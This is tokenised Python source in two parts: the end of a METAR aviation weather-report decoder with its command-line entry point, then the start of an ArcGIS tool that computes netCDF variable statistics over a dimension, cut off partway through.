<NUM_LIT:1> ] ) ) ) * <NUM_LIT> <EOL> wholeVis = <NUM_LIT:0> <EOL> else : <EOL> if value [ <NUM_LIT:0> ] . isdigit ( ) : <EOL> val = int ( value [ <NUM_LIT:0> ] ) * <NUM_LIT> <EOL> if val : <EOL> if self . foundRemark : <EOL> obs [ '<STR_LIT>' ] . append ( { '<STR_LIT>' : { '<STR_LIT>' : val } } ) <EOL> elif forecastConditions : <EOL> obs [ '<STR_LIT>' ] . append ( { '<STR_LIT>' : { '<STR_LIT>' : val } } ) <EOL> else : <EOL> obs [ '<STR_LIT>' ] [ '<STR_LIT>' ] = val <EOL> elif ( ( valLen == <NUM_LIT:4> and value . isdigit ( ) ) or <EOL> ( valLen == <NUM_LIT:5> and value [ <NUM_LIT:0> ] in self . qualifier and value [ <NUM_LIT:1> : ] . isdigit ( ) ) or <EOL> ( valLen >= <NUM_LIT:7> and valLen <= <NUM_LIT:8> and value . endswith ( '<STR_LIT>' ) and value [ ( valLen - <NUM_LIT:7> ) : ( valLen - <NUM_LIT:3> ) ] . isdigit ( ) ) ) : <EOL> if visDecoded and not ( self . foundRemark or forecastConditions ) : <EOL> success = False <EOL> else : <EOL> visDecoded = True <EOL> val = { <EOL> } <EOL> value = value . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> valLen = len ( value ) <EOL> if value [ <NUM_LIT:0> ] in self . qualifier : <EOL> val [ '<STR_LIT>' ] = self . qualifier [ value [ <NUM_LIT:0> ] ] <EOL> value = value [ <NUM_LIT:1> : valLen ] <EOL> valLen = len ( value ) <EOL> else : <EOL> val [ '<STR_LIT>' ] = None <EOL> val [ '<STR_LIT>' ] = None <EOL> if value == '<STR_LIT>' : <EOL> val [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> else : <EOL> val [ '<STR_LIT>' ] = int ( value ) / <NUM_LIT:1000> <EOL> value = self . peekNext ( ) <EOL> valLen = len ( value ) <EOL> if valLen >= <NUM_LIT:4> and value [ <NUM_LIT:0> : <NUM_LIT:4> ] . isdigit ( ) : <EOL> if valLen == <NUM_LIT:4> : <EOL> val [ '<STR_LIT>' ] = "<STR_LIT>" . format ( int ( value ) ) <EOL> else : <EOL> if value [ <NUM_LIT:4> : ] and value [ <NUM_LIT:4> : ] . strip ( '<STR_LIT>' ) == "<STR_LIT>" : <EOL> val [ '<STR_LIT>' ] = "<STR_LIT>" . format ( int ( value [ <NUM_LIT:0> : <NUM_LIT:4> ] ) ) <EOL> if value [ <NUM_LIT:4> : ] in self . direction : <EOL> val [ '<STR_LIT>' ] = [ self . direction [ value [ <NUM_LIT:4> : ] ] , '<STR_LIT>' ] <EOL> self . getNext ( ) <EOL> if self . foundRemark : <EOL> obs [ '<STR_LIT>' ] . append ( { '<STR_LIT>' : val } ) <EOL> elif forecastConditions : <EOL> obs [ '<STR_LIT>' ] . append ( { '<STR_LIT>' : val } ) <EOL> else : <EOL> obs [ '<STR_LIT>' ] = val <EOL> elif value == '<STR_LIT>' : <EOL> if visDecoded and not ( self . foundRemark or forecastConditions ) : <EOL> success = False <EOL> else : <EOL> visDecoded = True <EOL> val = "<STR_LIT>" <EOL> if self . foundRemark : <EOL> obs [ '<STR_LIT>' ] . append ( { '<STR_LIT>' : { '<STR_LIT>' : val } } ) <EOL> elif forecastConditions : <EOL> obs [ '<STR_LIT>' ] . append ( { '<STR_LIT>' : { '<STR_LIT>' : val } } ) <EOL> else : <EOL> obs [ '<STR_LIT>' ] [ '<STR_LIT>' ] = val <EOL> elif valLen >= <NUM_LIT:3> and ( value [ <NUM_LIT:0> ] == '<STR_LIT:R>' ) and value [ <NUM_LIT:1> : <NUM_LIT:3> ] . isdigit ( ) : <EOL> Runway = { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> for rvr in value . split ( "<STR_LIT:/>" ) : <EOL> if rvr : <EOL> if rvr [ <NUM_LIT:0> ] == '<STR_LIT:R>' and len ( rvr ) > <NUM_LIT:2> : <EOL> if len ( rvr ) == <NUM_LIT:3> : <EOL> Runway [ '<STR_LIT>' ] = "<STR_LIT>" . format ( int ( rvr [ <NUM_LIT:1> : ] ) ) <EOL> else : <EOL> Runway [ '<STR_LIT>' ] = "<STR_LIT>" . format ( int ( rvr [ <NUM_LIT:1> : <NUM_LIT:3> ] ) , rvr [ <NUM_LIT:3> : ] ) <EOL> elif rvr in self . tendency : <EOL> Runway [ '<STR_LIT>' ] = self . tendency [ rvr ] <EOL> else : <EOL> if rvr . find ( '<STR_LIT>' ) != - <NUM_LIT:1> : <EOL> units = <NUM_LIT> <EOL> else : <EOL> units = <NUM_LIT:1> <EOL> for var in rvr . split ( '<STR_LIT>' ) : <EOL> varOff = <NUM_LIT:0> <EOL> varLen = len ( var ) <EOL> varVal = '<STR_LIT>' <EOL> if var [ <NUM_LIT:0> ] in self . qualifier : <EOL> varVal = self . qualifier [ var [ <NUM_LIT:0> ] ] <EOL> varOff += <NUM_LIT:1> <EOL> if var [ varLen - <NUM_LIT:1> ] in self . tendency : <EOL> varLen -= <NUM_LIT:1> <EOL> Runway [ '<STR_LIT>' ] = self . tendency [ var [ varLen ] ] <EOL> if var . find ( '<STR_LIT>' ) != - <NUM_LIT:1> : <EOL> varLen -= <NUM_LIT:2> <EOL> if var [ varOff : varLen ] . isdigit ( ) : <EOL> varVal += "<STR_LIT>" . format ( int ( float ( var [ varOff : varLen ] ) * units ) ) <EOL> if '<STR_LIT>' not in Runway : <EOL> Runway [ '<STR_LIT>' ] = varVal <EOL> else : <EOL> Runway [ '<STR_LIT>' ] = Runway [ '<STR_LIT>' ] <EOL> Runway [ '<STR_LIT>' ] = varVal <EOL> obs [ '<STR_LIT>' ] . append ( Runway ) <EOL> elif ( valLen >= <NUM_LIT:3> and value [ <NUM_LIT:0> : <NUM_LIT:3> ] in self . coverage ) or ( valLen == <NUM_LIT:5> and value [ <NUM_LIT:0> : <NUM_LIT:2> ] in self . coverage ) : <EOL> val = self . decodeCloudCover ( value ) <EOL> if val : <EOL> if self . foundRemark : <EOL> obs [ '<STR_LIT>' ] . append ( val ) <EOL> elif forecastConditions : <EOL> obs [ '<STR_LIT>' ] . append ( val ) <EOL> else : <EOL> obs [ '<STR_LIT>' ] . append ( val ) <EOL> else : <EOL> success = False <EOL> val = self . decodeTotalCloudCover ( value ) <EOL> if obs [ '<STR_LIT>' ] : <EOL> if val > obs [ '<STR_LIT>' ] : <EOL> obs [ '<STR_LIT>' ] = val <EOL> else : <EOL> obs [ '<STR_LIT>' ] = val <EOL> val = self . decodeCloudCeiling ( value ) <EOL> if obs [ '<STR_LIT>' ] : <EOL> if val < obs [ '<STR_LIT>' ] : <EOL> obs [ '<STR_LIT>' ] = val <EOL> else : <EOL> obs [ '<STR_LIT>' ] = val <EOL> elif ( valLen >= <NUM_LIT:3> and valLen <= <NUM_LIT:7> ) and ( value . count ( '<STR_LIT:/>' ) >= <NUM_LIT:1> ) and value . strip ( '<STR_LIT:M>' ) [ <NUM_LIT:0> : <NUM_LIT:2> ] . isdigit ( ) : <EOL> if tempNdewDecoded : <EOL> success = False <EOL> else : <EOL> tempNdewDecoded = True <EOL> values = value . split ( '<STR_LIT:/>' , <NUM_LIT:1> ) <EOL> if values and values [ <NUM_LIT:0> ] : <EOL> for val in values : <EOL> if val . strip ( '<STR_LIT:M>' ) . isdigit ( ) : <EOL> units = <NUM_LIT:1> <EOL> if val [ <NUM_LIT:0> ] == '<STR_LIT:M>' : <EOL> units = - <NUM_LIT:1> <EOL> val = [ int ( val . strip ( '<STR_LIT:M>' ) ) * units , '<STR_LIT>' ] <EOL> if not obs [ '<STR_LIT>' ] : <EOL> obs [ '<STR_LIT>' ] = val <EOL> else : <EOL> obs [ '<STR_LIT>' ] = val <EOL> if obs [ '<STR_LIT>' ] : <EOL> if obs [ '<STR_LIT>' ] : <EOL> val = ALFlib . relativeHumidity ( obs [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , obs [ '<STR_LIT>' ] [ <NUM_LIT:0> ] ) <EOL> if val : <EOL> obs [ '<STR_LIT>' ] = [ int ( round ( val ) ) , '<STR_LIT>' ] <EOL> val = ALFlib . heatIndex ( obs [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , val ) <EOL> if val : <EOL> obs [ '<STR_LIT>' ] = [ round ( val * <NUM_LIT:10> ) / <NUM_LIT:10> , '<STR_LIT>' ] <EOL> if '<STR_LIT>' in obs [ '<STR_LIT>' ] and obs [ '<STR_LIT>' ] [ '<STR_LIT>' ] and obs [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] > <NUM_LIT:0> : <EOL> val = ALFlib . windChill ( obs [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , obs [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] ) <EOL> if val : <EOL> obs [ '<STR_LIT>' ] [ '<STR_LIT>' ] = [ round ( val * <NUM_LIT:10> ) / <NUM_LIT:10> , '<STR_LIT>' ] <EOL> else : <EOL> success = False <EOL> elif valLen == <NUM_LIT:5> and ( value [ <NUM_LIT:0> ] == '<STR_LIT:A>' or value [ <NUM_LIT:0> ] == '<STR_LIT>' ) and value [ <NUM_LIT:1> : ] . isdigit ( ) : <EOL> if not altDecoded : <EOL> altDecoded = True <EOL> if value [ <NUM_LIT:0> ] == '<STR_LIT:A>' : <EOL> obs [ '<STR_LIT>' ] = [ round ( float ( value [ <NUM_LIT:1> : ] ) / <NUM_LIT> , <NUM_LIT:1> ) , '<STR_LIT>' ] <EOL> else : <EOL> obs [ '<STR_LIT>' ] = [ float ( value [ <NUM_LIT:1> : ] ) , '<STR_LIT>' ] <EOL> elif not value . replace ( '<STR_LIT:/>' , '<STR_LIT>' ) : <EOL> pass <EOL> elif valLen >= <NUM_LIT:3> and value [ <NUM_LIT:0> : <NUM_LIT:3> ] in self . visibilityCode : <EOL> pass <EOL> elif value == '<STR_LIT>' : <EOL> obs [ '<STR_LIT>' ] . append ( self . remarks [ value ] ) <EOL> elif valLen >= <NUM_LIT:4> and value [ <NUM_LIT:0> : <NUM_LIT:4> ] == '<STR_LIT>' : <EOL> obs [ '<STR_LIT>' ] . append ( self . remarks [ '<STR_LIT>' ] ) <EOL> elif value == '<STR_LIT>' or value == '<STR_LIT>' : <EOL> obs [ '<STR_LIT>' ] . append ( self . remarks [ value ] ) <EOL> forecastConditions = True <EOL> elif valLen == <NUM_LIT:6> and ( value [ <NUM_LIT:0> : <NUM_LIT:2> ] == '<STR_LIT>' or value [ <NUM_LIT:0> : <NUM_LIT:2> ] == '<STR_LIT>' or value [ <NUM_LIT:0> : <NUM_LIT:2> ] == '<STR_LIT>' ) and value [ <NUM_LIT:2> : ] . isdigit ( ) : <EOL> obs [ '<STR_LIT>' ] . append ( "<STR_LIT>" . format ( self . remarks [ value [ <NUM_LIT:0> : <NUM_LIT:2> ] ] , value [ <NUM_LIT:2> : <NUM_LIT:4> ] , value [ <NUM_LIT:4> : ] ) ) <EOL> forecastConditions = True <EOL> else : <EOL> if valLen > <NUM_LIT:2> and value [ <NUM_LIT:0> : <NUM_LIT:2> ] == '<STR_LIT>' : <EOL> weatherType = '<STR_LIT>' <EOL> val = self . decodeWeatherObscuration ( value [ <NUM_LIT:2> : ] ) <EOL> else : <EOL> if forecastConditions : <EOL> weatherType = '<STR_LIT>' <EOL> else : <EOL> weatherType = '<STR_LIT>' <EOL> val = self . decodeWeatherObscuration ( value ) <EOL> if val : <EOL> obs [ weatherType ] . append ( val ) <EOL> if '<STR_LIT>' in val . lower ( ) : <EOL> obs [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> else : <EOL> success = False <EOL> if getNext : <EOL> value = self . getNext ( success ) <EOL> valLen = len ( value ) <EOL> obs [ '<STR_LIT>' ] [ '<STR_LIT>' ] = int ( float ( self . decoded ) / float ( len ( self . data ) ) * <NUM_LIT:100> ) <EOL> obs [ '<STR_LIT>' ] [ '<STR_LIT>' ] = int ( float ( self . standardDecoded ) / float ( self . remarkIndex ) * <NUM_LIT:100> ) <EOL> if ( len ( self . data ) - self . remarkIndex ) > <NUM_LIT:0> : <EOL> obs [ '<STR_LIT>' ] [ '<STR_LIT>' ] = int ( float ( self . remarksDecoded ) / float ( len ( self . data ) - self . remarkIndex ) * <NUM_LIT:100> ) <EOL> return obs <EOL> def decodeAutoMaintTemp ( self , value ) : <EOL> val = float ( value [ <NUM_LIT:1> : ] ) / <NUM_LIT:10> <EOL> if value [ <NUM_LIT:0> ] == '<STR_LIT:1>' : <EOL> val *= - <NUM_LIT:1> <EOL> return val <EOL> def decodeWindConditions ( self , value ) : <EOL> valLen = len ( value ) <EOL> wind = { <EOL> } <EOL> if value [ <NUM_LIT:0> : <NUM_LIT:3> ] . isdigit ( ) and int ( value [ <NUM_LIT:0> : <NUM_LIT:3> ] ) > <NUM_LIT:0> : <EOL> wind [ '<STR_LIT>' ] = [ int ( value [ <NUM_LIT:0> : <NUM_LIT:3> ] ) , '<STR_LIT>' ] <EOL> offset = valLen - <NUM_LIT:3> <EOL> if value [ offset ] . isdigit ( ) : <EOL> offset += <NUM_LIT:1> <EOL> units = value [ offset : valLen ] <EOL> if units . startswith ( '<STR_LIT>' ) : <EOL> units = <NUM_LIT> <EOL> elif units == '<STR_LIT>' : <EOL> units = <NUM_LIT> <EOL> else : <EOL> units = <NUM_LIT:1> <EOL> values = value [ <NUM_LIT:3> : offset ] . split ( '<STR_LIT>' ) <EOL> if values [ <NUM_LIT:0> ] . isdigit ( ) : <EOL> wind [ '<STR_LIT>' ] = [ int ( round ( float ( values [ <NUM_LIT:0> ] ) * units ) ) , '<STR_LIT>' ] <EOL> if len ( values ) == <NUM_LIT:2> and values [ <NUM_LIT:1> ] . isdigit ( ) : <EOL> wind [ '<STR_LIT>' ] = [ int ( round ( float ( values [ <NUM_LIT:1> ] ) * units ) ) , '<STR_LIT>' ] <EOL> values = self . peekNext ( ) . split ( '<STR_LIT>' ) <EOL> if len ( values ) == <NUM_LIT:2> and values [ <NUM_LIT:0> ] . isdigit ( ) and values [ <NUM_LIT:1> ] . isdigit ( ) : <EOL> From = int ( values [ <NUM_LIT:0> ] ) <EOL> To = int ( values [ <NUM_LIT:1> ] ) <EOL> if '<STR_LIT>' not in wind : <EOL> wind [ '<STR_LIT>' ] = [ <NUM_LIT:0> , '<STR_LIT>' ] <EOL> wind [ '<STR_LIT>' ] . append ( From ) <EOL> wind [ '<STR_LIT>' ] . append ( To ) <EOL> if wind [ '<STR_LIT>' ] [ <NUM_LIT:0> ] == <NUM_LIT:0> : <EOL> if To < From : <EOL> To += <NUM_LIT> <EOL> wind [ '<STR_LIT>' ] [ <NUM_LIT:0> ] = From + ( float ( To - From ) / <NUM_LIT:2> ) <EOL> if wind [ '<STR_LIT>' ] [ <NUM_LIT:0> ] > <NUM_LIT> : <EOL> wind [ '<STR_LIT>' ] [ <NUM_LIT:0> ] -= <NUM_LIT> <EOL> self . getNext ( ) <EOL> return wind <EOL> def decodeCloudCover ( self , value ) : <EOL> desc = '<STR_LIT>' <EOL> height = '<STR_LIT>' <EOL> type = '<STR_LIT>' <EOL> valLen = len ( value ) <EOL> valOff = <NUM_LIT:0> <EOL> if value [ <NUM_LIT:0> : <NUM_LIT:3> ] in self . coverage : <EOL> valOff = <NUM_LIT:3> <EOL> desc = self . coverage [ value [ <NUM_LIT:0> : <NUM_LIT:3> ] ] <EOL> elif value [ <NUM_LIT:0> : <NUM_LIT:2> ] in self . coverage and valLen == <NUM_LIT:5> : <EOL> valOff = <NUM_LIT:2> <EOL> desc = self . coverage [ value [ <NUM_LIT:0> : <NUM_LIT:2> ] ] <EOL> if valLen >= <NUM_LIT:5> : <EOL> if value [ valOff : ( valOff + <NUM_LIT:3> ) ] . isdigit ( ) : <EOL> val = float ( value [ valOff : ( valOff + <NUM_LIT:3> ) ] ) * <NUM_LIT> <EOL> if val >= <NUM_LIT:1000> : <EOL> val = int ( round ( val / <NUM_LIT:100> ) * <NUM_LIT:100> ) <EOL> else : <EOL> val = int ( round ( val / <NUM_LIT:10> ) * <NUM_LIT:10> ) <EOL> height = "<STR_LIT>" . format ( val ) <EOL> if value . endswith ( '<STR_LIT>' ) : <EOL> type = "<STR_LIT:U+0020>" + self . remarks [ '<STR_LIT>' ] <EOL> elif value . endswith ( '<STR_LIT>' ) : <EOL> type = "<STR_LIT:U+0020>" + self . remarks [ '<STR_LIT>' ] <EOL> else : <EOL> type = "<STR_LIT>" <EOL> return ( desc . format ( type ) + height ) <EOL> def decodeTotalCloudCover ( self , value ) : <EOL> val = <NUM_LIT:0> <EOL> if value [ <NUM_LIT:0> : <NUM_LIT:3> ] in self . totalCloudCover : <EOL> val = self . totalCloudCover [ value [ <NUM_LIT:0> : <NUM_LIT:3> ] ] <EOL> return val <EOL> def decodeCloudCeiling ( self , value ) : <EOL> desc = '<STR_LIT>' <EOL> height = None <EOL> type = '<STR_LIT>' <EOL> valLen = len ( value ) <EOL> valOff = <NUM_LIT:0> <EOL> if value [ <NUM_LIT:0> : <NUM_LIT:3> ] in self . coverage : <EOL> valOff = <NUM_LIT:3> <EOL> desc = self . coverage [ value [ <NUM_LIT:0> : <NUM_LIT:3> ] ] <EOL> elif value [ <NUM_LIT:0> : <NUM_LIT:2> ] in self . coverage and valLen == <NUM_LIT:5> : <EOL> valOff = <NUM_LIT:2> <EOL> desc = self . coverage [ value [ <NUM_LIT:0> : <NUM_LIT:2> ] ] <EOL> if valLen >= <NUM_LIT:5> : <EOL> if value [ valOff : ( valOff + <NUM_LIT:3> ) ] . isdigit ( ) : <EOL> val = float ( value [ valOff : ( valOff + <NUM_LIT:3> ) ] ) * <NUM_LIT> <EOL> if val >= <NUM_LIT:1000> : <EOL> val = int ( round ( val / <NUM_LIT:100> ) * <NUM_LIT:100> ) <EOL> else : <EOL> val = int ( round ( val / <NUM_LIT:10> ) * <NUM_LIT:10> ) <EOL> if value [ <NUM_LIT:0> : <NUM_LIT:3> ] == '<STR_LIT>' or value [ <NUM_LIT:0> : <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> height = val <EOL> return height <EOL> def decodeWeatherObscuration ( self , value ) : <EOL> if not value : <EOL> return '<STR_LIT>' <EOL> intensity = '<STR_LIT>' <EOL> proximity = '<STR_LIT>' <EOL> descriptor = '<STR_LIT>' <EOL> phenomenon = '<STR_LIT>' <EOL> sep = '<STR_LIT>' <EOL> offset = <NUM_LIT:0> <EOL> length = len ( value ) <EOL> if ( offset + <NUM_LIT:3> ) <= length : <EOL> if value [ offset ] in self . intensity : <EOL> if value [ offset : ( offset + <NUM_LIT:3> ) ] in self . other : <EOL> phenomenon = self . other [ value [ offset : ( offset + <NUM_LIT:3> ) ] ] <EOL> sep = '<STR_LIT>' <EOL> offset += <NUM_LIT:3> <EOL> else : <EOL> intensity = self . intensity [ value [ offset ] ] + "<STR_LIT:U+0020>" <EOL> offset += <NUM_LIT:1> <EOL> if ( offset + <NUM_LIT:2> ) <= length : <EOL> if value [ offset : ( offset + <NUM_LIT:2> ) ] in self . proximity : <EOL> proximity = "<STR_LIT:U+0020>" + self . proximity [ value [ offset : ( offset + <NUM_LIT:2> ) ] ] <EOL> offset += <NUM_LIT:2> <EOL> if ( offset + <NUM_LIT:2> ) <= length : <EOL> if value [ offset : ( offset + <NUM_LIT:2> ) ] in self . descriptor : <EOL> descriptor = self . descriptor [ value [ offset : ( offset + <NUM_LIT:2> ) ] ] <EOL> offset += <NUM_LIT:2> <EOL> while ( offset + <NUM_LIT:2> ) <= length : <EOL> val = value [ offset : ( offset + <NUM_LIT:2> ) ] <EOL> if val in self . precipitation : <EOL> val = intensity + self . precipitation [ val ] <EOL> intensity = '<STR_LIT>' <EOL> if descriptor : <EOL> if value [ ( offset - <NUM_LIT:2> ) : ( offset + <NUM_LIT:2> ) ] in self . conjunction : <EOL> val = self . conjunction [ value [ ( offset - <NUM_LIT:2> ) : ( offset + <NUM_LIT:2> ) ] ] + "<STR_LIT:U+0020>" + val <EOL> elif val in self . obscuration : <EOL> val = self . obscuration [ val ] <EOL> elif val in self . other : <EOL> val = self . other [ val ] <EOL> else : <EOL> break <EOL> if descriptor : <EOL> val = "<STR_LIT:U+0020>" + val <EOL> phenomenon += sep + descriptor + val <EOL> descriptor = '<STR_LIT>' <EOL> sep = '<STR_LIT>' <EOL> offset += <NUM_LIT:2> <EOL> if offset == length : <EOL> return ( descriptor + phenomenon + proximity ) . strip ( ) <EOL> else : <EOL> return '<STR_LIT>' <EOL> def usage ( help = False ) : <EOL> """<STR_LIT>""" <EOL> fileName = os . path . split ( __file__ ) [ <NUM_LIT:1> ] <EOL> title = "<STR_LIT>" . format ( fileName , MetarReader . version ) <EOL> print title <EOL> print "<STR_LIT:->" * ( len ( title ) - <NUM_LIT:1> ) <EOL> if help : <EOL> print MetarReader . __doc__ <EOL> print "<STR_LIT>" <EOL> print usage . __doc__ . format ( fileName ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> verbose = False <EOL> decode = False <EOL> cycle = False <EOL> for index in range ( len ( sys . argv ) - <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> ) : <EOL> if sys . argv [ index ] == '<STR_LIT>' : <EOL> verbose = True <EOL> del sys . argv [ index ] <EOL> elif sys . argv [ index ] == '<STR_LIT>' : <EOL> usage ( True ) <EOL> sys . exit ( ) <EOL> elif sys . argv [ index ] == '<STR_LIT>' : <EOL> decode = True <EOL> del sys . argv [ index ] <EOL> elif sys . argv [ index ] == '<STR_LIT:-c>' : <EOL> cycle = True <EOL> del sys . argv [ index ] <EOL> if decode or len ( sys . argv ) > <NUM_LIT:1> : <EOL> Metar = MetarReader ( verbose , False , cycle ) <EOL> if len ( sys . argv ) > <NUM_LIT:1> : <EOL> Metar . decode ( sys . argv [ <NUM_LIT:1> : ] ) <EOL> else : <EOL> Metar . decode ( ) <EOL> sys . exit ( ) <EOL> else : <EOL> usage ( ) </s>
<s> import arcpy <EOL> import mds <EOL> import mds . messages <EOL> import numpy <EOL> import netCDF4 <EOL> import os . path <EOL> class GetVariableStatisticsOverDimension ( object ) : <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . label = "<STR_LIT>" <EOL> self . description = "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" <EOL> self . canRunInBackground = False <EOL> statistics_numpy = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> self . statistics = [ [ numpy . ma , statistics_numpy ] ] <EOL> self . default_statistic = "<STR_LIT>" <EOL> def getParameterInfo ( self ) : <EOL> """<STR_LIT>""" <EOL> parameters = [ ] <EOL> parameters . append ( arcpy . Parameter ( <EOL> displayName = "<STR_LIT>" , <EOL> name = "<STR_LIT>" , <EOL> datatype = [ "<STR_LIT>" , "<STR_LIT>" ] , <EOL> parameterType = "<STR_LIT>" , <EOL> direction = "<STR_LIT>" ) ) <EOL> parameters . append ( arcpy . Parameter ( <EOL> displayName = "<STR_LIT>" , <EOL> name = "<STR_LIT>" , <EOL> datatype = "<STR_LIT>" , <EOL> parameterType = "<STR_LIT>" , <EOL> direction = "<STR_LIT>" ) ) <EOL> parameters [ - <NUM_LIT:1> ] . parameterDependencies = [ parameters [ - <NUM_LIT:2> ] . name ] <EOL> parameters . append ( arcpy . Parameter ( <EOL> displayName = "<STR_LIT>" , <EOL> name = "<STR_LIT>" , <EOL> datatype = "<STR_LIT>" , <EOL> parameterType = "<STR_LIT>" , <EOL> direction = "<STR_LIT>" ) ) <EOL> parameters [ - <NUM_LIT:1> ] . parameterDependencies = [ parameters [ - <NUM_LIT:2> ] . name ] <EOL> parameters . append ( arcpy . Parameter ( <EOL> displayName = "<STR_LIT>" , <EOL> name = "<STR_LIT>" , <EOL> datatype = "<STR_LIT>" , <EOL> multiValue = False , <EOL> parameterType = "<STR_LIT>" , <EOL> direction = "<STR_LIT>" ) ) <EOL> parameters . append ( arcpy . Parameter ( <EOL> displayName = "<STR_LIT>" , <EOL> name = "<STR_LIT>" , <EOL> datatype = "<STR_LIT>" , <EOL> multiValue = False , <EOL> parameterType = "<STR_LIT>" , <EOL> direction = "<STR_LIT>" ) ) <EOL> parameters . append ( arcpy . Parameter ( <EOL> displayName = "<STR_LIT>" , <EOL> name = "<STR_LIT>" , <EOL> datatype = "<STR_LIT>" , <EOL> parameterType = "<STR_LIT>" , <EOL> direction = "<STR_LIT>" ) ) <EOL> parameters [ - <NUM_LIT:1> ] . filter . type = "<STR_LIT>" <EOL> parameters [ - <NUM_LIT:1> ] . filter . list = sorted ( [ key for stat in self . statistics for key in stat [ <NUM_LIT:1> ] . keys ( ) ] ) <EOL> parameters [ - <NUM_LIT:1> ] . value = self . default_statistic <EOL> return parameters <EOL> def isLicensed ( self ) : <EOL> """<STR_LIT>""" <EOL> return True <EOL> def updateParameters ( self , parameters ) : <EOL> """<STR_LIT>""" <EOL> return <EOL> def updateMessages ( self , parameters ) : <EOL> """<STR_LIT>""" <EOL> input_parameter = parameters [ <NUM_LIT:0> ] <EOL> variable_parameter = parameters [ <NUM_LIT:1> ] <EOL> dimension_parameter = parameters [ <NUM_LIT:2> ] <EOL> output_parameter = parameters [ <NUM_LIT:3> ] <EOL> output_var_parameter = parameters [ <NUM_LIT:4> ] <EOL> type_parameter = parameters [ <NUM_LIT:5> ] <EOL> dataset = None <EOL> if input_parameter . value is not None : <EOL> try : <EOL> dataset = mds . netcdf . Dataset ( input_parameter . valueAsText , '<STR_LIT>' ) <EOL> except RuntimeError , exception : <EOL> if "<STR_LIT>" in str ( exception ) or "<STR_LIT>" in str ( exception ) : <EOL> input_parameter . setErrorMessage ( <EOL> mds . messages . INPUT_DATASET_DOES_NOT_RESOLVE_TO_FILENAME . format ( <EOL> input_parameter . valueAsText ) ) <EOL> elif "<STR_LIT>" in str ( exception ) : <EOL> input_parameter . setErrorMessage ( <EOL> mds . messages . INPUT_DATASET_URL_MALFORMED . format ( <EOL> input_parameter . valueAsText ) ) <EOL> else : <EOL> input_parameter . setErrorMessage ( <EOL> mds . messages . INPUT_DATASET_GENERIC_ERROR . format ( <EOL> input_parameter . valueAsText , str ( exception ) ) ) <EOL> except Exception , exception : <EOL> input_parameter . setErrorMessage ( <EOL> mds . messages . INPUT_DATASET_GENERIC_ERROR . format ( <EOL> input_parameter . valueAsText , str ( exception ) ) ) <EOL> if dataset is not None : <EOL> variable_parameter . filter . type = "<STR_LIT>" <EOL> variable_parameter . filter . list = list ( dataset . variable_names ( ) ) <EOL> else : <EOL> variable_parameter . filter . type = "<STR_LIT>" <EOL> variable_parameter . filter . list = [ ] <EOL> variable_parameter . value = "<STR_LIT>" <EOL> dimension_parameter . filter . type = "<STR_LIT>" <EOL> dimension_parameter . filter . list = [ ] <EOL> dimension_parameter . value = "<STR_LIT>" <EOL> if ( variable_parameter . value is not None ) and ( dataset is not None ) : <EOL> dimension_parameter . filter . type = "<STR_LIT>" <EOL> dimension_parameter . filter . list = list ( <EOL> dataset . variable_dimension_names ( variable_parameter . valueAsText ) ) <EOL> else : <EOL> dimension_parameter . filter . type = "<STR_LIT>" <EOL> dimension_parameter . filter . list = [ ] <EOL> dimension_parameter . value = "<STR_LIT>" <EOL> if ( output_var_parameter . altered ) and ( output_var_parameter . value is None ) : <EOL> output_var_parameter . setErrorMessage ( <EOL> '<STR_LIT>' % output_var_parameter . name ) <EOL> if ( output_var_parameter . value is not None ) and ( dataset is not None ) and ( output_var_parameter . value in dataset . variable_names ( ) ) : <EOL> output_var_parameter . setErrorMessage ( <EOL> '<STR_LIT>' % output_var_parameter . name ) <EOL> if ( variable_parameter . value is not None ) and ( dimension_parameter . value is not None ) and ( not output_var_parameter . altered ) : <EOL> if type_parameter . value is None : <EOL> output_var_parameter . value = variable_parameter . value + "<STR_LIT>" + dimension_parameter . value <EOL> else : <EOL> output_var_parameter . value = variable_parameter . value + "<STR_LIT:_>" + type_parameter . value + dimension_parameter . value <EOL> if output_parameter . value is not None : <EOL> output_filename = output_parameter . valueAsText <EOL> if os . path . splitext ( output_filename ) [ <NUM_LIT:1> ] != "<STR_LIT>" : <EOL> output_parameter . setErrorMessage ( <EOL> mds . messages . OUTPUT_FILE_EXTENSION_MUST_BE_NC ) <EOL> return <EOL> def calculate_statistic ( self , variable , dimension , statistic ) : <EOL> for stat in self . statistics : <EOL> if statistic in stat [ <NUM_LIT:1> ] : <EOL> func = getattr ( stat [ <NUM_LIT:0> ] , stat [ <NUM_LIT:1> ] [ statistic ] ) <EOL> break <EOL> else : <EOL> func = getattr ( numpy . ma , '<STR_LIT>' ) <EOL> return func ( variable , axis = dimension ) <EOL> def execute ( self , parameters , messages ) : <EOL> """<STR_LIT>""" <EOL> input_parameter = parameters [ <NUM_LIT:0> ] <EOL> variable_parameter = parameters [ <NUM_LIT:1> ] <EOL> dimension_parameter = parameters [ <NUM_LIT:2> ] <EOL> output_parameter = parameters [ <NUM_LIT:3> ] <EOL> output_var_parameter = parameters [ <NUM_LIT:4> ] <EOL> type_parameter = parameters [ <NUM_LIT:5> ] <EOL> dataset_name = input_parameter . valueAsText <EOL> try : <EOL> dataset = mds . netcdf . Dataset ( dataset_name , '<STR_LIT>' ) <EOL> except RuntimeError , exception : <EOL> messages . addErrorMessage ( str ( exception ) ) <EOL> raise arcpy . ExecuteError <EOL> var1 = dataset . variable ( variable_parameter . valueAsText ) <EOL> dim1 = var1 . dimensions . index ( dimension_parameter . valueAsText ) <EOL> result1 = self . calculate_statistic ( var1 [ : ] 